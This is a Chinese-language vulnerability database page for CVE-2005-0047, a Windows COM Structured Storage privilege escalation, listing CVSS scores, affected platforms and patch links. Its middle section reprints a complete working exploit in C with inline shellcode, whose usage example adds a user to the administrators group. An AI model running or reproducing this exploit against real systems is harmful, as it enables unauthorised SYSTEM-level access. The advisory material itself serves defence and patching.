CVE-2005-0047
CVSS7.2
发布时间 :2005-05-02 00:00:00
修订时间 :2016-10-17 23:07:34
NMCOEPS    

[原文]Windows 2000, XP, and Server 2003 does not properly "validate the use of memory regions" for COM structured storage files, which allows attackers to execute arbitrary code, aka the "COM Structured Storage Vulnerability."


[CNNVD]Microsoft OLE和COM远程缓冲区溢出漏洞(CNNVD-200505-502)

        Microsoft COM提供多个对象存储在一个文档中;使用Microsoft OLE技术,应用程序可提供嵌入和链接支持。
        Microsoft COM和OLE存在安全问题,本地或远程攻击者可以利用这个漏洞提升特权及执行任意指令。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_xp::sp2:home
cpe:/o:microsoft:windows_xp::sp1:home
cpe:/o:microsoft:windows_2003_server:web
cpe:/o:microsoft:windows_2003_server:enterprise_64-bit
cpe:/o:microsoft:windows_xp::sp1:media_centerMicrosoft windows xp_sp1 media_center
cpe:/o:microsoft:windows_xp::sp2:media_centerMicrosoft windows xp_sp2 media_center
cpe:/o:microsoft:windows_2003_server:r2::datacenter_64-bit
cpe:/o:microsoft:windows_2003_server:standard::64-bit
cpe:/o:microsoft:windows_2000::sp3:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP3
cpe:/o:microsoft:windows_2000::sp4:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP4
cpe:/o:microsoft:windows_xp::sp1:64-bit
cpe:/o:microsoft:windows_2000::sp1:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP1
cpe:/o:microsoft:windows_2000::sp2:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP2
cpe:/o:microsoft:windows_xp:::media_center
cpe:/o:microsoft:windows_2000:::advanced_server
cpe:/o:microsoft:windows_xp::sp2:tablet_pcMicrosoft windows xp_sp2 tablet_pc
cpe:/o:microsoft:windows_xp::gold:professionalMicrosoft Windows XP Professional Gold
cpe:/o:microsoft:windows_2000::sp3:professionalMicrosoft Windows 2000 Professional SP3
cpe:/o:microsoft:windows_2003_server:enterprise::64-bit
cpe:/o:microsoft:windows_2000::sp4:professionalMicrosoft Windows 2000 Professional SP4
cpe:/o:microsoft:windows_2000::sp1:professionalMicrosoft Windows 2000 Professional SP1
cpe:/o:microsoft:windows_2003_server:r2::64-bit
cpe:/o:microsoft:windows_2000::sp2:professionalMicrosoft Windows 2000 Professional SP2
cpe:/o:microsoft:windows_2000::sp4:advanced_serverMicrosoft Windows 2000 Advanced Server SP4
cpe:/o:microsoft:windows_2000:::datacenter_server
cpe:/o:microsoft:windows_2000::sp3:advanced_serverMicrosoft Windows 2000 Advanced Server SP3
cpe:/o:microsoft:windows_2000::sp2:advanced_serverMicrosoft Windows 2000 Advanced Server SP2
cpe:/o:microsoft:windows_2000::sp1:advanced_serverMicrosoft Windows 2000 Advanced Server SP1
cpe:/o:microsoft:windows_2000::sp1:serverMicrosoft Windows 2000 Server SP1
cpe:/o:microsoft:windows_2000::sp4:serverMicrosoft Windows 2000 Server SP4
cpe:/o:microsoft:windows_2000::sp3:serverMicrosoft Windows 2000 Server SP3
cpe:/o:microsoft:windows_xp:::64-bit
cpe:/o:microsoft:windows_2000:::server
cpe:/o:microsoft:windows_2000:::professional
cpe:/o:microsoft:windows_xp:::home
cpe:/o:microsoft:windows_2000::sp2:serverMicrosoft Windows 2000 Server SP2

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:901Server 2003 COM Structured Storage Vulnerability
oval:org.mitre.oval:def:2892Windows XP,SP1 COM Structured Storage Vulnerability
oval:org.mitre.oval:def:2351Windows XP,SP2 COM Structured Storage Vulnerability
oval:org.mitre.oval:def:1159Windows 2000 COM Structured Storage Vulnerability
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0047
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0047
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-502
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=111755870828817&w=2
(UNKNOWN)  BUGTRAQ  20050530 [Argeniss] MS05-012 Exploit
http://www.argeniss.com/research/SSExploit.c
(UNKNOWN)  MISC  http://www.argeniss.com/research/SSExploit.c
http://www.kb.cert.org/vuls/id/597889
(PATCH)  CERT-VN  VU#597889
http://www.microsoft.com/technet/security/bulletin/ms05-012.mspx
(PATCH)  MS  MS05-012
http://www.us-cert.gov/cas/techalerts/TA05-039A.html
(PATCH)  CERT  TA05-039A
http://xforce.iss.net/xforce/xfdb/19105
(UNKNOWN)  XF  win-com-gain-privileges(19105)

- 漏洞信息

Microsoft OLE和COM远程缓冲区溢出漏洞
高危 访问验证错误
2005-05-02 00:00:00 2005-10-20 00:00:00
本地  
        Microsoft COM提供多个对象存储在一个文档中;使用Microsoft OLE技术,应用程序可提供嵌入和链接支持。
        Microsoft COM和OLE存在安全问题,本地或远程攻击者可以利用这个漏洞提升特权及执行任意指令。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        Microsoft Windows XP Media Center Edition SP2
        Microsoft Security Update for Windows XP (KB873333)
        http://www.microsoft.com/downloads/details.aspx?familyid=A0E59D77-8AC1 -4AC0-9572-A7E1C2E4A66A&displaylang=en
        Microsoft Windows Server 2003 Datacenter Edition
        Microsoft Security Update for Windows Server 2003 (KB873333)
        http://www.microsoft.com/downloads/details.aspx?familyid=83B97ECE-0010 -443E-9353-82FFCAF73771&displaylang=en
        Microsoft Windows XP 64-bit Edition SP1
        Microsoft Security Update for XP 64-Bit Edition Service Pack 1 (KB873333)
        http://www.microsoft.com/downloads/details.aspx?familyid=F80EABC3-6D39 -4532-9178-7967626977EE&displaylang=en
        Microsoft Windows 2000 Advanced Server SP4
        Microsoft Security Update for Windows 2000 (873333)
        http://www.microsoft.com/downloads/details.aspx?familyid=84B4F65E-39D5 -4521-B692-051F76F2492E&displaylang=en
        Microsoft Windows 2000 Professional SP3
        Microsoft Security Update for Windows 2000 (873333)
        http://www.microsoft.com/downloads/details.aspx?familyid=84B4F65E-39D5 -4521-B692-051F76F2492E&displaylang=en
        Microsoft Windows XP Tablet PC Edition SP1
        Microsoft Security Update for Windows XP (KB873333)
        http://www.microsoft.com/downloads/details.aspx?familyid=A0E59D77-8AC1 -4AC0-9572-A7E1C2E4A66A&displaylang=en
        Microsoft Windows Server 2003 Enterprise Edition
        Microsoft Security Update for Windows Server 2003 (KB873333)
        http://www.microsoft.com/downloads/details.aspx?familyid=83B97ECE-0010 -443E-9353-82FFCAF73771&displaylang=en
        Microsoft Windows XP Home SP2
        Microsoft Security Update for Windows XP (KB873333)
        http://www.microsoft.com/downloads/details.aspx?familyid=A0E59D77-8AC1 -4AC0-9572-A7E1C2E4A66A&displaylang=en
        Microsoft Windows 2000 Datacenter Server SP4
        Microsoft Security Update for Windows 2000 (873333)
        http://www.microsoft.com/downloads/details.aspx?familyid=84B4F65E-39D5 -4521-B692-051F76F2492E&displaylang=en
        Microsoft Windows XP Tablet PC Edition SP2
        Microsoft Security Update for Windows XP (KB873333)
        http://www.microsoft.com/downloads/details.aspx?familyid=A0E59D77-8AC1 -4AC0-9572-A7E1C2E4A66A&displaylang=en
        Microsoft Windows XP Media Center Edition SP1
        Microsoft Security Update for Windows XP (KB873333)
        http://www.microsoft.com/downloads/details.aspx?familyid=A0E59D77-8AC1 -4AC0-9572-A7E1C2E4A66A&displaylang=en
        Microsoft Windows Server 2003 Web Edition
        Microsoft Security Update for Windows Server 2003 (KB873333)
        http://www.microsoft.com/downloads/details.aspx?familyid=83B97ECE-0010 -443E-9353-82FFCAF73771&displaylang=en
        Microsoft Windows 2000 Advanced Server SP3
        Microsoft Security Update for Windows 2000 (873333)
        http://www.microsoft.com/downloads/details.aspx?familyid=84B4F65E-39D5 -4521-B692-051F76F2492E&displaylang=en
        Microsoft Windows XP Home SP1
        Microsoft Security Update for Windows XP (KB873333)
        http://www.microsoft.com/downloads/details.aspx?familyid=A0E59D77-8AC1 -4AC0-9572-A7E1C2E4A66A&displaylang=en
        Microsoft Windows 2000 Datacenter Server SP3
        Microsoft Security Update for Windows 2000 (873333)
        http://www.microsoft.com/downloads/details.aspx?familyid=84B4F65E-39D5 -4521-B692-051F76F2492E&displaylang=en
        Microsoft Windows Server 2003 Enterprise Edition Itanium 0
        Microsoft Security Update for Windows Server 2003 for Itanium-based Systems (KB873333)
        http://www.microsoft.com/downloads/details.aspx?familyid=A2C9E842-551C -458E-BF19-1C2BA9F21A06&displaylang=en
        Microsoft Windows 2000 Server SP3
        Microsoft Security Update for Windows 2000 (873333)
        http://www.microsoft.com/downloads/details.aspx?familyid=84B4F65E-39D5 -4521-B692-051F76F2492E&displaylang=en
        Microsoft Windows Server 2003 Standard Edition
        Microsoft Security Update for Windows Server 2003 (KB873333)
        http://www.microsoft.com/downloads/details.aspx?familyid=83B97ECE-0010 -443E-9353-82FFCAF73771&displaylang=en
        Microsoft Windows XP 64-bit Edition Version 2003
        Microsoft Security Update for XP 64-Bit Edition Version 2003 (KB873333)
        http://www.microsoft.com/downloads/details.aspx?familyid=A2C9E8

- 漏洞信息 (1019)

MS Windows COM Structured Storage Local Exploit (MS05-012) (EDBID:1019)
windows local
2005-05-31 Verified
0 Cesar Cerrudo
N/A [点击下载]
// by Cesar Cerrudo - Argeniss - www.argeniss.com
// MS05-012 - COM Structured Storage Vulnerability - CAN-2005-0047 Exploit
//
// More exploits at www.argeniss.com/products.html
//
// Works on Win2k sp4, WinXP sp2, Win2k3 sp0
// Close all runing programs to avoid possible problems
// If it finds the section and it doesn't work remove section permissions 
// from msiexec service process with WinObj or crash the msiexec service and try again 
// if offsets don't work, debug and change them

#include <windows.h>
#include <stdio.h>

typedef struct _LSA_UNICODE_STRING {  
	USHORT Length;  
	USHORT MaximumLength; 
	PWSTR Buffer;
} UNICODE_STRING;

typedef struct _OBJDIR_INFORMATION {
  UNICODE_STRING          ObjectName;
  UNICODE_STRING          ObjectTypeName;
  BYTE                    Data[1];
} OBJDIR_INFORMATION;

typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    UNICODE_STRING *ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;        
    PVOID SecurityQualityOfService;  
} OBJECT_ATTRIBUTES;

#define InitializeObjectAttributes( p, n, a, r, s ) { \
    (p)->Length = sizeof( OBJECT_ATTRIBUTES );          \
    (p)->RootDirectory = r;                             \
    (p)->Attributes = a;                                \
    (p)->ObjectName = n;                                \
    (p)->SecurityDescriptor = s;                        \
    (p)->SecurityQualityOfService = NULL;               \
    }

typedef DWORD (WINAPI* MSIINSTALLPRODUCT)(LPCSTR szPackagePath, LPCSTR szCommandLine);
MSIINSTALLPRODUCT MsiInstallProduct;

typedef DWORD (WINAPI* NTQUERYDIRECTORYOBJECT)( HANDLE, OBJDIR_INFORMATION*, DWORD, DWORD ,DWORD,DWORD*,DWORD* );
NTQUERYDIRECTORYOBJECT NtQueryDirectoryObject;

typedef DWORD (WINAPI* NTOPENDIRECTORYOBJECT)( HANDLE *, DWORD,OBJECT_ATTRIBUTES* );
NTOPENDIRECTORYOBJECT  NtOpenDirectoryObject;


DWORD WINAPI  LoadWinInstaller(LPVOID lpParam) 
{ 
	HMODULE hMsi;

	hMsi = LoadLibrary("msi.dll"); 
	MsiInstallProduct = (MSIINSTALLPRODUCT)GetProcAddress(hMsi, "MsiInstallProductA");
  //run unistall , without permissions this makes a windows pop up
  //while this window is showing the shared section is created and available on Windows Installer service process
	MsiInstallProduct((char*)lpParam,"REMOVE=ALL");
  
	return 0; 
} 



int main(int argc, char* argv[])
{

  OBJDIR_INFORMATION *ssinfo  =(OBJDIR_INFORMATION* ) HeapAlloc(GetProcessHeap(), 0, 0x800);

  HANDLE hFile,hThread,hMapFile; 
  HMODULE hNtdll ,hKernel;
  DWORD dwThreadId; 
  OBJECT_ATTRIBUTES obj;
  WCHAR  * uString=L"\\BaseNamedObjects";
  UNICODE_STRING str;
  DWORD i,a,iStrLen,b=0;
  char sObjName[30],sTmp[50];
  LPVOID lpMapAddress;
  FARPROC pWinExec,pExitThread;
  bool bFound;
  char* sCommand;


  if (!argv[1]||!argv[2]) {
	printf("\nUsage :\n	SSExploit \"Applicatoin to uninstall\" \"command\" \n");
	printf("\nExamples :\n  SSExploit \"c:\\windows\\system32\\webfldrs.msi\" \"cmd.exe\" (cmd.exe will interactively run on Win2k only) \n  SSExploit \"c:\\windows\\system32\\webfldrs.msi\" \"net localgroup administrators /add youruser\" \n");
	exit(0);
  }
    
  iStrLen=strlen(argv[2]);

  if(iStrLen>=65){
	printf("\n\"command\" must be less than 65 chars.\n");
	exit(0);
  }

  sCommand=argv[2];

  hThread = CreateThread(NULL,0,LoadWinInstaller,argv[1],0,&dwThreadId); 

  Sleep(3000);

  hNtdll = LoadLibrary("ntdll.dll");    

  NtQueryDirectoryObject = (NTQUERYDIRECTORYOBJECT )GetProcAddress(hNtdll,"NtQueryDirectoryObject");
  NtOpenDirectoryObject = (NTOPENDIRECTORYOBJECT )GetProcAddress(hNtdll,"NtOpenDirectoryObject");
  
  str.Length=wcslen(uString)*2;
  str.MaximumLength =wcslen(uString)*2+2;
  str.Buffer =uString;

  InitializeObjectAttributes (&obj, &str, 0, 0, 00);
  NtOpenDirectoryObject(&hFile,0x20001,&obj);

  printf("\nSearching for Shared Section...\n\n"); 

  // Get all objects names under \BaseNamedObjects

  if (NtQueryDirectoryObject(hFile,ssinfo,0x800,TRUE,TRUE,&b,&a)==0){
	do{ 
		bFound=NULL;
		while (NtQueryDirectoryObject(hFile,ssinfo,0x800,TRUE,FALSE,&b,&a)==0){
		  //check if it's a section name	
			if (!wcscmp(ssinfo->ObjectTypeName.Buffer ,L"Section")){             
				for (i=0;(i<=wcslen(ssinfo->ObjectName.Buffer))&(i<30);i++){
					sObjName[i]=(char)ssinfo->ObjectName.Buffer[i];
				}
		      //check if it's the one we are searching for
				if (!strncmp(sObjName,"DfSharedHeap",12)){      
					bFound=1;
					break;
				}
			}
		}
		if (bFound)
			printf("Shared Section Found: %s\n",sObjName);
		else {
			printf("Shared Section Not Found");
			exit(0);
		}
    
		strcpy(sTmp,"Global\\");
		strcat(sTmp,sObjName);    //append global prefix to support Terminal Services	

		hMapFile = OpenFileMapping(FILE_MAP_WRITE, FALSE,sTmp); 
	
      //the shared section name couldn't be the one we are searching for
		if (hMapFile == NULL) 
			printf("Could not open Shared Section\n\n"); 
		else
			printf("Shared Section opened\n\n"); 
	
	} while (hMapFile == NULL) ;

	lpMapAddress = MapViewOfFile(hMapFile, FILE_MAP_WRITE,0,0,0);
 
	if (lpMapAddress == NULL) { 
		printf("Could not map Shared Section"); 
		exit(0);
	}
	else 
		printf("Shared Section Mapped\n\nOverwriting Pointer and Inyecting Shellcode...\n\n"); 

	hKernel=LoadLibrary("Kernel32.dll");
	
	pWinExec=GetProcAddress(hKernel,"WinExec");
	pExitThread=GetProcAddress(hKernel,"ExitThread");

	_asm{
			
		mov eax,fs:[30h]   // get pointer to PEB 
		mov eax,[eax+0A8h] // get OS minor version
		cmp eax,0x0
		jz W2ksp4
		cmp eax,0x1        
		jz WinXPsp2
		jmp Win2K3   // address of section seems static on same OS version
					
	W2Ksp4:
		mov eax,0x0101FFF0 // address of begining of section - 0x10 used to overwrite pointer
		mov edx,0x01020004 // address of shellcode
		jmp Done
	
	WinXPsp2:
		mov eax,0x0086FFF0 // address of begining of section - 0x10 used to overwrite pointer
		mov edx,0x00870004 // address of shellcode
		jmp Done
	
	Win2K3:
		mov eax,0x007BFFF0 // address of begining of section - 0x10 used to overwrite pointer
		mov edx,0x007C0004 // address of shellcode

	Done:
		mov ebx,lpMapAddress
		mov ecx, 0x1000

	l00p:                  // overwrite section data, so overwriten structures will point to shellcode
		mov dword ptr[ebx],eax 
		sub ecx,0x4
		add ebx,0x4

		cmp ecx,0x0
		jnz l00p

		mov ebx,lpMapAddress  //address of shellcode
		mov dword ptr[ebx],edx                    
		
	//start copying shellcode
    
		lea esi, Shellcode
		lea edi, [ebx+4]
		lea ecx, End
		sub ecx, esi
		push esi
		push edi
		cld
		rep movsb

		pop edi
		pop esi
		push edi
		lea ecx, CommandBuf
		sub ecx, esi
		add edi, ecx
		mov esi, sCommand
		mov ecx, iStrLen
		rep movsb
		mov [edi], 0x00

		pop edi
		mov esi, pWinExec
		mov [edi+0x5], esi

		mov esi, pExitThread
		mov [edi+0x9], esi

	}

	printf("Command should have been executed ;)\n"); 
	CloseHandle(hMapFile);

  }
  else printf("Couldn't get object names \n");	

  return 0;

	_asm{

	Shellcode:
		call getDelta
				// this gets overwrited
		mov ax,0xffff	
		mov ax,0xffff	

	CommandBuf:					// this gets overwrited
		mov dword ptr[eax],0x55555555
		mov dword ptr[eax],0x55555555	
		mov dword ptr[eax],0x55555555	
		mov dword ptr[eax],0x55555555	
		mov dword ptr[eax],0x55555555	
		mov dword ptr[eax],0x55555555	
		mov dword ptr[eax],0x55555555	
		mov dword ptr[eax],0x55555555	
		mov dword ptr[eax],0x55555555	
		mov dword ptr[eax],0x55555555	
		mov dword ptr[eax],0x55555555	

	getDelta:
		pop edx							// Get shellcode/shared section pointer
		push edx						// save edx

		push 0x1						// push 0x0 for hidden window
		lea eax, [edx+0x8]					
		push eax						// Command offset
		call [edx]						// Call WinExec
       
		pop edx
		call [edx+0x4]					// Call ExitThread to avoid msiexec service to crash

	End:
	}
}

// milw0rm.com [2005-05-31]
		

- 漏洞信息 (F39363)

SSExploit.c (PacketStormID:F39363)
2005-08-14 00:00:00
Cesar Cerrudo  argeniss.com
exploit
windows,2k
CVE-2005-0047
[点击下载]

Exploit for the COM structured storage vulnerability as described in MS05-012. Work on Win2k SP4, WinXP SP2, and Win2k3 SP0.

- 漏洞信息

13601
Microsoft Windows COM Structured Storage Privilege Escalation
Local Access Required Attack Type Unknown
Loss of Integrity
Exploit Public

- 漏洞描述

Windows contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered improper access to shared memory by COM when working with structured storage. This flaw may lead to a loss of integrity.

- 时间线

2005-02-08 Unknow
2005-05-30 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Microsoft Windows COM Structured Storage Local Privilege Escalation Vulnerability
Access Validation Error 12483
No Yes
2005-02-08 12:00:00 2009-07-12 10:06:00
Discovery is credited to Cesar Cerrudo of Application Security Inc.

- 受影响的程序版本

Nortel Networks Symposium Web Client
Nortel Networks Symposium Web Center Portal (SWCP)
Nortel Networks Symposium TAPI Service Provider
Nortel Networks Symposium Express Call Center (SECC)
Nortel Networks Symposium Call Center Server (SCCS)
Nortel Networks Optivity Network Management System
Nortel Networks Mobile Voice Client 2050
Nortel Networks IP softphone 2050
Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server

- 漏洞讨论

Microsoft Windows is reported prone to a local privilege escalation vulnerability when processing COM structured storage files. This issue may allow a local attacker to gain elevated privileges on a vulnerable computer.

An attacker with local interactive access may craft an application that triggers this condition and gain SYSTEM privileges on a vulnerable computer.

- 漏洞利用

Cesar Cerrudo provides the following proof of concept exploit:

- 解决方案

Microsoft has released updates to address this vulnerability on supported platforms.

Nortel Networks has released security advisory 2005005514 acknowledging this issue. Please the referenced advisory for further information.


Microsoft Windows XP Media Center Edition SP2

Microsoft Windows Server 2003 Datacenter Edition

Microsoft Windows XP 64-bit Edition SP1

Microsoft Windows 2000 Advanced Server SP4

Microsoft Windows 2000 Professional SP3

Microsoft Windows XP Tablet PC Edition SP1

Microsoft Windows Server 2003 Enterprise Edition

Microsoft Windows XP Home SP2

Microsoft Windows 2000 Datacenter Server SP4

Microsoft Windows XP Tablet PC Edition SP2

Microsoft Windows XP Media Center Edition SP1

Microsoft Windows Server 2003 Web Edition

Microsoft Windows 2000 Advanced Server SP3

Microsoft Windows XP Home SP1

Microsoft Windows 2000 Datacenter Server SP3

Microsoft Windows Server 2003 Enterprise Edition Itanium 0

Microsoft Windows 2000 Server SP3

Microsoft Windows Server 2003 Standard Edition

Microsoft Windows XP 64-bit Edition Version 2003

Microsoft Windows XP Professional SP2

Microsoft Windows 2000 Server SP4

Microsoft Windows 2000 Professional SP4

Microsoft Windows XP Professional SP1

Microsoft Windows Server 2003 Datacenter Edition Itanium 0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站